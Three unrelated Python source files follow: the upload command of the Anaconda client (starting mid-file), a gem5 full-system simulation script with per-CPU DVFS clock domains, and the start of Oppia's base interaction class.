            message = "Could not detect package name for package type %s, please use the --package option" % (package_type,)
            logger.error(message)
            raise errors.BinstarError(message)
        package_name = package_attrs['name']
    return package_name
def get_version(args, release_attrs, package_type):
    """Resolve the release version from --version or the file's metadata."""
    if args.version:
        return args.version
    if 'version' not in release_attrs:
        message = "Could not detect package version for package type %s, please use the --version option" % (package_type,)
        logger.error(message)
        raise errors.BinstarError(message)
    return release_attrs['version']
def add_package(aserver_api, args, username, package_name, package_attrs, package_type):
    """Return the package record, auto-registering it when permitted.

    Raises errors.UserError when the package is missing and
    --auto-register is off, errors.BinstarError when no summary can be
    determined for a newly registered package.
    """
    try:
        return aserver_api.package(username, package_name)
    except errors.NotFound:
        if not args.auto_register:
            message = (
                'Anaconda repository package %s/%s does not exist. '
                'Please run "anaconda package --create" to create this package namespace in the cloud.' %
                (username, package_name)
            )
            logger.error(message)
            raise errors.UserError(message)
        # --summary wins; otherwise fall back to the detected metadata.
        summary = args.summary
        if not summary:
            if 'summary' not in package_attrs:
                message = "Could not detect package summary for package type %s, please use the --summary option" % (package_type,)
                logger.error(message)
                raise errors.BinstarError(message)
            summary = package_attrs['summary']
        return aserver_api.add_package(
            username,
            package_name,
            summary,
            package_attrs.get('license'),
            public=not args.private,
            attrs=package_attrs,
            license_url=package_attrs.get('license_url'),
            license_family=package_attrs.get('license_family'),
            package_type=package_type,
        )
def add_release(aserver_api, args, username, package_name, version, release_attrs):
    """Ensure the release exists, creating it (interactively if requested)."""
    try:
        # Probe for an existing release first.
        aserver_api.release(username, package_name, version)
    except errors.NotFound:
        create = create_release_interactive if args.mode == 'interactive' else create_release
        create(aserver_api, username, package_name, version, release_attrs)
def remove_existing_file(aserver_api, args, username, package_name, version, file_attrs):
    """Handle a pre-existing distribution with the same basename.

    Returns True when the existing distribution is kept (caller must skip
    the upload); a falsy value (False/None) means the way is clear:
    either no distribution existed or it was removed (force/interactive).
    """
    try:
        aserver_api.distribution(username, package_name, version, file_attrs['basename'])
    except errors.NotFound:
        # Nothing to remove; proceed with the upload.
        return False
    else:
        if args.mode == 'force':
            logger.warning('Distribution "%s" already exists. Removing.', file_attrs['basename'])
            aserver_api.remove_dist(username, package_name, version, file_attrs['basename'])
        if args.mode == 'interactive':
            if bool_input('Distribution "%s" already exists. Would you like to replace it?' % file_attrs['basename']):
                aserver_api.remove_dist(username, package_name, version, file_attrs['basename'])
            else:
                logger.info('Not replacing distribution "%s"', file_attrs['basename'])
                # User declined: keep the server copy, skip the upload.
                return True
def upload_package(filename, package_type, aserver_api, username, args):
    """Upload one file as a package distribution.

    Ensures the package and release exist, resolves any pre-existing
    distribution according to args.mode, then uploads the file.

    Returns [package_name, upload_info]; upload_info is {} when a
    Conflict was skipped, and the function returns None when an existing
    distribution was deliberately kept.
    """
    logger.info('Extracting {} attributes for upload'.format(verbose_package_type(package_type)))
    try:
        package_attrs, release_attrs, file_attrs = get_attrs(package_type, filename, parser_args=args)
    except Exception:
        message = 'Trouble reading metadata from {}. Is this a valid {} package?'.format(
            filename, verbose_package_type(package_type)
        )
        logger.error(message)
        # --show-traceback re-raises the original parse error instead.
        if args.show_traceback:
            raise
        raise errors.BinstarError(message)
    if args.build_id:
        file_attrs['attrs']['binstar_build'] = args.build_id
    # Command-line summary/description override detected metadata.
    if args.summary:
        release_attrs['summary'] = args.summary
    if args.description:
        release_attrs['description'] = args.description
    package_name = get_package_name(args, package_attrs, filename, package_type)
    version = get_version(args, release_attrs, package_type)
    logger.info('Creating package "%s"', package_name)
    package = add_package(aserver_api, args, username, package_name, package_attrs, package_type)
    package_types = package.get('package_types', [])
    allowed_package_types = set(package_types)
    # conda and pypi distributions are allowed to coexist under one name.
    for group in [{'conda', 'pypi'}]:
        if allowed_package_types & group:
            allowed_package_types.update(group)
    if package_types and (package_type not in allowed_package_types):
        message = 'You already have a {} named \'{}\'. Use a different name for this {}.'.format(
            verbose_package_type(package_types[0] if package_types else ''), package_name,
            verbose_package_type(package_type),
        )
        logger.error(message)
        raise errors.BinstarError(message)
    logger.info('Creating release "%s"', version)
    add_release(aserver_api, args, username, package_name, version, release_attrs)
    # Some detectors override the package type used for the upload itself.
    binstar_package_type = file_attrs.pop('binstar_package_type', package_type)
    logger.info('Uploading file "%s/%s/%s/%s"', username, package_name, version, file_attrs['basename'])
    # A truthy return means an existing distribution was kept: skip upload.
    if remove_existing_file(aserver_api, args, username, package_name, version, file_attrs):
        return
    try:
        with open(filename, 'rb') as fd:
            upload_info = aserver_api.upload(username, package_name, version, file_attrs['basename'], fd,
                                             binstar_package_type, args.description,
                                             dependencies=file_attrs.get('dependencies'), attrs=file_attrs['attrs'],
                                             channels=args.labels, callback=upload_print_callback(args))
    except errors.Conflict:
        upload_info = {}
        if args.mode != 'skip':
            logger.info('Distribution already exists. Please use the -i/--interactive or --force or --skip options '
                        'or `anaconda remove %s/%s/%s/%s', username, package_name, version, file_attrs['basename'])
            raise
        logger.info('Distribution already exists. Skipping upload.\n')
    if upload_info:
        logger.info("Upload complete\n")
    return [package_name, upload_info]
def get_convert_files(files):
    """Cross-convert conda packages to all platforms; return the paths of
    every file the conversion produced.

    The temporary output directory is intentionally left on disk: the
    returned paths are uploaded by the caller afterwards.
    """
    tmpdir = tempfile.mkdtemp()
    for filepath in files:
        logger.info('Running conda convert on "%s"', filepath)
        proc = subprocess.Popen(
            ['conda-convert', '-p', 'all', filepath, '-o', tmpdir],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE
        )
        _, stderr = proc.communicate()
        # Conversion failures are non-fatal; just warn and move on.
        if stderr:
            logger.warning('Couldn\'t generate platform packages for %s: %s', filepath, stderr)
    return [
        os.path.join(root, name)
        for root, _, filenames in os.walk(tmpdir)
        for name in filenames
    ]
def main(args):
    """Entry point for the ``anaconda upload`` sub-command.

    Resolves the upload username, validates it against the server, expands
    and validates the file list, then uploads each file as either a project
    or a package. Raises errors.BinstarError on a missing user or file.
    """
    config = get_config(site=args.site)
    aserver_api = get_server_api(token=args.token, site=args.site, config=config)
    aserver_api.check_server()

    # Username resolution order: -u/--user flag, then the config file's
    # 'upload_user', then the account that owns the auth token.
    validate_username = True
    if args.user:
        username = args.user
    elif 'upload_user' in config:
        username = config['upload_user']
    else:
        # The token owner is authoritative, so skip the extra lookup below.
        validate_username = False
        user = aserver_api.user()
        username = user['login']

    logger.info('Using "%s" as upload username', username)

    if validate_username:
        try:
            aserver_api.user(username)
        except errors.NotFound:
            message = 'User "{}" does not exist'.format(username)
            logger.error(message)
            raise errors.BinstarError(message)

    uploaded_packages = []
    uploaded_projects = []

    # Flatten file list because of 'windows_glob' function
    files = [f for fglob in args.files for f in fglob]

    if args.all:
        files += get_convert_files(files)

    for filename in files:
        if not exists(filename):
            message = 'File "{}" does not exist'.format(filename)
            logger.error(message)
            raise errors.BinstarError(message)
        else:
            logger.info("Processing '%s'", filename)

        package_type = determine_package_type(filename, args)

        if package_type == 'project':
            uploaded_projects.append(upload_project(filename, args, username))
        else:
            if package_type == 'ipynb' and not args.mode == 'force':
                # Validate the notebook before uploading unless --force.
                # NOTE(review): the file handle passed to nbformat.read is
                # never closed — consider a ``with open(...)`` block.
                try:
                    nbformat.read(open(filename), nbformat.NO_CONVERT)
                except Exception as error:
                    logger.error("Invalid notebook file '%s': %s", filename, error)
                    logger.info("Use --force to upload the file anyways")
                    continue

            package_info = upload_package(
                filename,
                package_type=package_type,
                aserver_api=aserver_api,
                username=username,
                args=args)

            # upload_package returns [name, upload_info] on success; anything
            # else (None, or an empty upload_info) means the upload was
            # skipped and is not reported below.
            if package_info is not None and len(package_info) == 2:
                _package, _upload_info = package_info
                if _upload_info:
                    uploaded_packages.append(package_info)

    for package, upload_info in uploaded_packages:
        package_url = upload_info.get('url', 'https://anaconda.org/%s/%s' % (username, package))
        # NOTE(review): ``package_type`` here is the value left over from the
        # last loop iteration above, not the type of this ``package`` —
        # confirm whether a per-package type should be recorded instead.
        logger.info("{} located at:\n{}\n".format(verbose_package_type(package_type), package_url))

    for project_name, url in uploaded_projects:
        logger.info("Project {} uploaded to {}.\n".format(project_name, url))
def windows_glob(item):
    """Expand a wildcard pattern into matching paths, Windows only.

    Unix shells expand globs before Python sees them, so on any platform
    other than Windows — or when *item* contains no ``*`` — the argument is
    returned untouched, wrapped in a single-element list.
    """
    if os.name != 'nt' or '*' not in item:
        return [item]
    return glob(item)
def add_parser(subparsers):
    """Register the ``upload`` sub-command and all its arguments.

    :param subparsers: the argparse sub-parsers object of the main CLI.
    """
    description = 'Upload packages to your Anaconda repository'
    parser = subparsers.add_parser('upload',
                                   formatter_class=argparse.RawDescriptionHelpFormatter,
                                   help=description, description=description,
                                   epilog=__doc__)

    # Each positional argument is expanded by windows_glob into a *list* of
    # paths, so args.files is a list of lists (flattened again in main()).
    parser.add_argument('files', nargs='+', help='Distributions to upload', default=[], type=windows_glob)

    label_help = (
        '{deprecation}Add this file to a specific {label}. '
        'Warning: if the file {label}s do not include "main", '
        'the file will not show up in your user {label}')
    # -c/--channel is the deprecated spelling of -l/--label; both append to
    # the same ``labels`` destination.
    parser.add_argument('-c', '--channel', action='append', default=[], dest='labels',
                        help=label_help.format(deprecation='[DEPRECATED]\n', label='channel'),
                        metavar='CHANNELS')
    parser.add_argument('-l', '--label', action='append', dest='labels',
                        help=label_help.format(deprecation='', label='label'))
    parser.add_argument('--no-progress', help="Don't show upload progress", action='store_true')
    parser.add_argument('-u', '--user', help='User account or Organization, defaults to the current user')
    parser.add_argument('--all', help='Use conda convert to generate packages for all platforms and upload them',
                        action='store_true')

    mgroup = parser.add_argument_group('metadata options')
    mgroup.add_argument('-p', '--package', help='Defaults to the package name in the uploaded file')
    mgroup.add_argument('-v', '--version', help='Defaults to the package version in the uploaded file')
    mgroup.add_argument('-s', '--summary', help='Set the summary of the package')

    # To preserve current behavior: 'conda' and 'pypi' are autodetected only
    # and are therefore hidden from the -t/--package-type help text.
    pkgs = PACKAGE_TYPES.copy()
    pkgs.pop('conda')
    pkgs.pop('pypi')
    pkg_types = ', '.join(list(pkgs.keys()))
    mgroup.add_argument('-t', '--package-type', help='Set the package type [{0}]. Defaults to autodetect'.format(pkg_types))
    mgroup.add_argument('-d', '--description', help='description of the file(s)')
    mgroup.add_argument('--thumbnail', help='Notebook\'s thumbnail image')
    mgroup.add_argument('--private', help="Create the package with private access", action='store_true')

    # Whether a missing package namespace should be created automatically;
    # the default comes from the user's configuration.
    register_group = parser.add_mutually_exclusive_group()
    register_group.add_argument("--no-register", dest="auto_register", action="store_false",
                                help='Don\'t create a new package namespace if it does not exist')
    register_group.add_argument("--register", dest="auto_register", action="store_true",
                                help='Create a new package namespace if it does not exist')
    parser.set_defaults(auto_register=DEFAULT_CONFIG.get('auto_register', True))

    parser.add_argument('--build-id', help='Anaconda repository Build ID (internal only)')

    # Conflict-resolution mode: exactly one of interactive/fail/force/skip,
    # stored in args.mode (default 'fail' behavior when unset).
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-i', '--interactive', action='store_const', help='Run an interactive prompt if any packages are missing',
                       dest='mode', const='interactive')
    group.add_argument('-f', '--fail', help='Fail if a package or release does not exist (default)',
                       action='store_const', dest='mode', const='fail')
    group.add_argument('--force', help='Force a package upload regardless of errors',
                       action='store_const', dest='mode', const='force')
    group.add_argument('--skip-existing', help='Skip errors on package batch upload if it already exists',
                       action='store_const', dest='mode', const='skip')

    parser.set_defaults(main=main)
| |
# Copyright (c) 2010-2013 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2012-2014 Mark D. Hill and David A. Wood
# Copyright (c) 2009-2011 Advanced Micro Devices, Inc.
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
# Brad Beckmann
import optparse
import sys
import m5
from m5.defines import buildEnv
from m5.objects import *
from m5.util import addToPath, fatal
addToPath('../common')
addToPath('../ruby')
import Ruby
from FSConfig import *
from SysPaths import *
from Benchmarks import *
import Simulation
import CacheConfig
import MemConfig
from Caches import *
import Options
# Check if KVM support has been enabled, we might need to do VM
# configuration if that's the case. BaseKvmCPU is only present in the
# m5.objects namespace when gem5 was compiled with KVM support.
have_kvm_support = 'BaseKvmCPU' in globals()


def is_kvm_cpu(cpu_class):
    """Return True when *cpu_class* is a KVM-based CPU model.

    Returns False when KVM support is compiled out or *cpu_class* is None.
    """
    # ``is not None`` (identity) instead of ``!= None``; short-circuiting
    # keeps issubclass() from being reached when KVM is unavailable.
    return (have_kvm_support and cpu_class is not None and
            issubclass(cpu_class, BaseKvmCPU))
def initO3params(options, num_cpus, testsys):
    """Copy the per-unit scaling switches from the parsed options onto
    every CPU of the test system.

    For each CPU i in [0, num_cpus) and each flag named
    ``<unit>_scale_enabled`` (ROB, BTB, TLB, IQ, register file, LSQ, ALU,
    FPU, D-cache, I-cache), the value is read from *options*, assigned to
    ``testsys.cpu[i]``, and echoed for logging.
    """
    # Unit order matters only for the log output; it matches the original
    # hand-unrolled assignment sequence.
    units = ['rob', 'btb', 'tlb', 'iq', 'regfile',
             'lsq', 'alu', 'fpu', 'dcache', 'icache']
    for i in range(0, num_cpus):
        cpu = testsys.cpu[i]
        for unit in units:
            attr = '%s_scale_enabled' % unit
            setattr(cpu, attr, getattr(options, attr))
            # print() of one pre-formatted string behaves identically under
            # Python 2 (paren expression) and Python 3 (function call).
            print('for cpu:%d %s:%d' % (i, attr, getattr(cpu, attr)))
def build_test_system(np):
    """Construct and wire up the full-system "system under test".

    Relies on module-level globals set by the top-level script: ``options``,
    ``bm``, ``test_mem_mode``, ``TestCPUClass``, ``FutureClass`` and
    ``TestMemClass``. Returns the configured system object.
    """
    # ISA-specific base system built around the first benchmark entry.
    if buildEnv['TARGET_ISA'] == "alpha":
        test_sys = makeLinuxAlphaSystem(test_mem_mode, bm[0], options.ruby)
    elif buildEnv['TARGET_ISA'] == "mips":
        test_sys = makeLinuxMipsSystem(test_mem_mode, bm[0])
    elif buildEnv['TARGET_ISA'] == "sparc":
        test_sys = makeSparcSystem(test_mem_mode, bm[0])
    elif buildEnv['TARGET_ISA'] == "x86":
        test_sys = makeLinuxX86System(test_mem_mode, options.num_cpus, bm[0],
                                      options.ruby)
    elif buildEnv['TARGET_ISA'] == "arm":
        test_sys = makeArmSystem(test_mem_mode, options.machine_type, bm[0],
                                 options.dtb_filename,
                                 bare_metal=options.bare_metal,
                                 sdcard_image=options.sdcard_image)
        if options.enable_context_switch_stats_dump:
            test_sys.enable_context_switch_stats_dump = True
    else:
        fatal("Incapable of building %s full system!", buildEnv['TARGET_ISA'])

    # Set the cache line size for the entire system
    test_sys.cache_line_size = options.cacheline_size

    # Create a top-level voltage domain
    test_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)

    # Create a source clock for the system and set the clock period
    test_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
            voltage_domain = test_sys.voltage_domain)

    # Create a clock running constantly at 1.4GHz for the L2
    test_sys.clk_domain_const = SrcClockDomain(clock = ["1.4GHz"],
            voltage_domain = test_sys.voltage_domain)

    # Create a CPU voltage domain
    test_sys.cpu_voltage_domain = VoltageDomain()

    # Create a source clock for the CPUs and set the clock period.
    # Earlier variants (kept for reference):
    #test_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
    #                                         voltage_domain =
    #                                         test_sys.cpu_voltage_domain)
    #test_sys.cpu_clk_domain = SrcClockDomain(clock = ["3GHz","2GHz","1GHz"],
    # One DVFS-capable clock domain per CPU (domain_id 0..3), each with the
    # same ladder of operating points from 1.4GHz down to 0.2GHz.
    test_sys.cpu_clk_domain = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
                                             voltage_domain =
                                             test_sys.cpu_voltage_domain,
                                             domain_id=0)
    test_sys.cpu_clk_domain1 = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
                                              voltage_domain =
                                              test_sys.cpu_voltage_domain,
                                              domain_id=1)
    test_sys.cpu_clk_domain2 = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
                                              voltage_domain =
                                              test_sys.cpu_voltage_domain,
                                              domain_id=2)
    test_sys.cpu_clk_domain3 = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
                                              voltage_domain =
                                              test_sys.cpu_voltage_domain,
                                              domain_id=3)

    if options.kernel is not None:
        test_sys.kernel = binary(options.kernel)

    if options.script is not None:
        test_sys.readfile = options.script

    if options.lpae:
        test_sys.have_lpae = True

    if options.virtualisation:
        test_sys.have_virtualization = True

    test_sys.init_param = options.init_param

    # Original generic form, replaced by the explicit list below:
    #test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=i)
    #                for i in xrange(np)]
    # NOTE(review): hard-codes exactly four CPUs, one per clock domain and
    # socket, regardless of np — confirm this script is only ever run with
    # --num-cpus=4.
    test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=0, socket_id=0), TestCPUClass(clk_domain=test_sys.cpu_clk_domain1, cpu_id=1, socket_id=1), TestCPUClass(clk_domain=test_sys.cpu_clk_domain2, cpu_id=2, socket_id=2), TestCPUClass(clk_domain=test_sys.cpu_clk_domain3, cpu_id=3, socket_id=3)]

    if is_kvm_cpu(TestCPUClass) or is_kvm_cpu(FutureClass):
        test_sys.vm = KvmVM()

    # Enable DVFS over all four per-CPU clock domains.
    test_sys.dvfs_handler.enable = True
    test_sys.dvfs_handler.transform_enable = True # We do want O3 CPU to transform
    test_sys.dvfs_handler.domains = [test_sys.cpu_clk_domain, test_sys.cpu_clk_domain1, test_sys.cpu_clk_domain2, test_sys.cpu_clk_domain3]

    if options.ruby:
        # Check for timing mode because ruby does not support atomic accesses
        if not (options.cpu_type == "detailed" or options.cpu_type == "timing"):
            print >> sys.stderr, "Ruby requires TimingSimpleCPU or O3CPU!!"
            sys.exit(1)

        Ruby.create_system(options, test_sys, test_sys.iobus, test_sys._dma_ports)

        # Create a seperate clock domain for Ruby
        test_sys.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock,
                voltage_domain = test_sys.voltage_domain)

        for (i, cpu) in enumerate(test_sys.cpu):
            #
            # Tie the cpu ports to the correct ruby system ports
            #
            cpu.clk_domain = test_sys.cpu_clk_domain
            cpu.createThreads()
            cpu.createInterruptController()
            cpu.icache_port = test_sys.ruby._cpu_ports[i].slave
            cpu.dcache_port = test_sys.ruby._cpu_ports[i].slave

            if buildEnv['TARGET_ISA'] == "x86":
                # x86 additionally routes page-table walkers and the
                # interrupt controller through Ruby.
                cpu.itb.walker.port = test_sys.ruby._cpu_ports[i].slave
                cpu.dtb.walker.port = test_sys.ruby._cpu_ports[i].slave

                cpu.interrupts.pio = test_sys.ruby._cpu_ports[i].master
                cpu.interrupts.int_master = test_sys.ruby._cpu_ports[i].slave
                cpu.interrupts.int_slave = test_sys.ruby._cpu_ports[i].master

            test_sys.ruby._cpu_ports[i].access_phys_mem = True

        # Create the appropriate memory controllers
        # and connect them to the IO bus
        test_sys.mem_ctrls = [TestMemClass(range = r) for r in test_sys.mem_ranges]
        for i in xrange(len(test_sys.mem_ctrls)):
            test_sys.mem_ctrls[i].port = test_sys.iobus.master
    else:
        # Classic memory system: bridge or IOCache between IO bus and membus.
        if options.caches or options.l2cache:
            # By default the IOCache runs at the system clock
            test_sys.iocache = IOCache(addr_ranges = test_sys.mem_ranges)
            test_sys.iocache.cpu_side = test_sys.iobus.master
            test_sys.iocache.mem_side = test_sys.membus.slave
        else:
            test_sys.iobridge = Bridge(delay='50ns', ranges = test_sys.mem_ranges)
            test_sys.iobridge.slave = test_sys.iobus.master
            test_sys.iobridge.master = test_sys.membus.slave

        # Sanity check
        if options.fastmem:
            if TestCPUClass != AtomicSimpleCPU:
                fatal("Fastmem can only be used with atomic CPU!")
            if (options.caches or options.l2cache):
                fatal("You cannot use fastmem in combination with caches!")

        for i in xrange(np):
            if options.fastmem:
                test_sys.cpu[i].fastmem = True
            if options.checker:
                test_sys.cpu[i].addCheckerCpu()
            test_sys.cpu[i].createThreads()

        CacheConfig.config_cache(options, test_sys)
        MemConfig.config_mem(options, test_sys)

    return test_sys
def build_drive_system(np):
    """Construct the driver system used in dual-system (etherlink) runs.

    The driver always uses an atomic AtomicSimpleCPU with SimpleMemory,
    built around the second benchmark entry (``bm[1]``). Returns the
    configured system object.
    """
    # driver system CPU is always simple, so is the memory
    # Note this is an assignment of a class, not an instance.
    DriveCPUClass = AtomicSimpleCPU
    drive_mem_mode = 'atomic'
    DriveMemClass = SimpleMemory

    # ISA-specific base system built around the second benchmark entry.
    if buildEnv['TARGET_ISA'] == 'alpha':
        drive_sys = makeLinuxAlphaSystem(drive_mem_mode, bm[1])
    elif buildEnv['TARGET_ISA'] == 'mips':
        drive_sys = makeLinuxMipsSystem(drive_mem_mode, bm[1])
    elif buildEnv['TARGET_ISA'] == 'sparc':
        drive_sys = makeSparcSystem(drive_mem_mode, bm[1])
    elif buildEnv['TARGET_ISA'] == 'x86':
        drive_sys = makeLinuxX86System(drive_mem_mode, np, bm[1])
    elif buildEnv['TARGET_ISA'] == 'arm':
        drive_sys = makeArmSystem(drive_mem_mode, options.machine_type, bm[1])

    # Create a top-level voltage domain
    drive_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)

    # Create a source clock for the system and set the clock period
    drive_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
            voltage_domain = drive_sys.voltage_domain)

    # Create a CPU voltage domain
    drive_sys.cpu_voltage_domain = VoltageDomain()

    # Create a source clock for the CPUs and set the clock period
    drive_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
                                              voltage_domain =
                                              drive_sys.cpu_voltage_domain)

    drive_sys.cpu = DriveCPUClass(clk_domain=drive_sys.cpu_clk_domain,
                                  cpu_id=0)
    drive_sys.cpu.createThreads()
    drive_sys.cpu.createInterruptController()
    drive_sys.cpu.connectAllPorts(drive_sys.membus)
    if options.fastmem:
        drive_sys.cpu.fastmem = True
    if options.kernel is not None:
        drive_sys.kernel = binary(options.kernel)

    if is_kvm_cpu(DriveCPUClass):
        drive_sys.vm = KvmVM()

    # Bridge I/O traffic from the IO bus onto the memory bus.
    drive_sys.iobridge = Bridge(delay='50ns',
                                ranges = drive_sys.mem_ranges)
    drive_sys.iobridge.slave = drive_sys.iobus.master
    drive_sys.iobridge.master = drive_sys.membus.slave

    # Create the appropriate memory controllers and connect them to the
    # memory bus
    drive_sys.mem_ctrls = [DriveMemClass(range = r)
                           for r in drive_sys.mem_ranges]
    for i in xrange(len(drive_sys.mem_ctrls)):
        drive_sys.mem_ctrls[i].port = drive_sys.membus.master

    drive_sys.init_param = options.init_param

    return drive_sys
# ---- Top-level script: parse options, build systems, run simulation. ----

# Add options
parser = optparse.OptionParser()
Options.addCommonOptions(parser)
Options.addFSOptions(parser)

# Add the ruby specific and protocol specific options
if '--ruby' in sys.argv:
    Ruby.define_options(parser)

(options, args) = parser.parse_args()

# This script takes option flags only; positional arguments are an error.
if args:
    print "Error: script doesn't take any positional arguments"
    sys.exit(1)

# system under test can be any CPU
(TestCPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options)

# lokeshjindal15 -- debug aid: report whether the O3 model was selected.
if (TestCPUClass == DerivO3CPU):
    print ("**** TestCpuClass is: DerivO3CPU")
else:
    print ("**** TestCpuClass is NOT DerivO3CPU")

# Match the memories with the CPUs, based on the options for the test system
TestMemClass = Simulation.setMemClass(options)

# Resolve the benchmark(s): a named entry from Benchmarks, or one (or two,
# with --dual) generic SysConfig entries built from the options.
if options.benchmark:
    try:
        bm = Benchmarks[options.benchmark]
    except KeyError:
        print "Error benchmark %s has not been defined." % options.benchmark
        print "Valid benchmarks are: %s" % DefinedBenchmarks
        sys.exit(1)
else:
    if options.dual:
        bm = [SysConfig(disk=options.disk_image, mem=options.mem_size),
              SysConfig(disk=options.disk_image, mem=options.mem_size)]
    else:
        bm = [SysConfig(disk=options.disk_image, mem=options.mem_size)]

np = options.num_cpus

test_sys = build_test_system(np)
print "cpu_type is: " + options.cpu_type

# Apply the per-unit scaling switches only for CPU models that expose them.
if (options.cpu_type == "detailed" or options.cpu_type == "arm_detailed" or options.cpu_type == "DerivO3CPU" or options.cpu_type == "atomic"):
    print "########## Running initO3params for various scaling switches"
    initO3params(options, np, test_sys)
else:
    print "########## NOT Running initO3params for various scaling switches"

# Two benchmark entries mean a dual (tested + driver) setup joined by an
# ethernet link; one entry is a single-system run.
if len(bm) == 2:
    drive_sys = build_drive_system(np)
    root = makeDualRoot(True, test_sys, drive_sys, options.etherdump)
elif len(bm) == 1:
    root = Root(full_system=True, system=test_sys)
else:
    print "Error I don't know how to create more than 2 systems."
    sys.exit(1)

if options.timesync:
    root.time_sync_enable = True

if options.frame_capture:
    VncServer.frame_capture = True

#m5.disableAllListeners()  # lokesh: to suppress gdb read error
Simulation.setWorkCountOptions(test_sys, options)
Simulation.run(options, root, test_sys, FutureClass)
| |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for defining interactions.
A note on terminology: state_customization_args refers to the values of
customization args that are provided by an exploration editor. They are
formatted as
{ca_name: {value: ca_value}}
On the other hand, interaction.customization_args refers to a combination of
the interaction customization arg spec and the value used. It is a list of
dicts, each representing a customization arg -- viz.:
[{
'name': ca_name,
'value': ca_value,
'default_value': ...,
...
}]
"""
__author__ = 'Sean Lip'
import copy
import os
from core.domain import obj_services
from core.domain import rule_domain
from extensions import domain
import feconf
import jinja_utils
import schema_utils
import utils
# Indicates that the learner view of the interaction should be displayed in the
# context of the conversation.
DISPLAY_MODE_INLINE = 'inline'
# Indicates that the learner view of the interaction should be displayed as a
# separate object from the conversation.
DISPLAY_MODE_SUPPLEMENTAL = 'supplemental'

# The complete set of display modes that an interaction may declare.
ALLOWED_DISPLAY_MODES = [DISPLAY_MODE_SUPPLEMENTAL, DISPLAY_MODE_INLINE]
class BaseInteraction(object):
    """Base interaction definition class.

    This class is not meant to be user-editable. The only methods on it should
    be get()-type methods.

    Note that all interactions should also include a thumbnail image of size
    178 x 146 pixels. This image will be shown in the interaction selector.
    """

    # The human-readable name of the interaction. Overridden in subclasses.
    name = ''
    # A description of the interaction. Overridden in subclasses.
    description = ''
    # Describes how the interaction should be displayed -- either within the
    # conversation ('inline'), or as a separate object ('supplemental'). In the
    # latter case, the interaction instance is reused if two adjacent states
    # have the same interaction id.
    display_mode = ''
    # Whether this interaction should be considered terminal, i.e. it ends
    # the exploration. Defaults to False.
    is_terminal = False
    # Whether this interaction supports training and fuzzy classification.
    is_trainable = False
    # Additional JS library dependencies that should be loaded in pages
    # containing this interaction. These should correspond to names of files in
    # feconf.DEPENDENCIES_TEMPLATES_DIR. Overridden in subclasses.
    _dependency_ids = []
    # The type of answer (as a string) accepted by this interaction, e.g.
    # 'CodeEvaluation'.
    answer_type = None
    # Customization arg specifications for the component, including their
    # descriptions, schemas and default values. Overridden in subclasses.
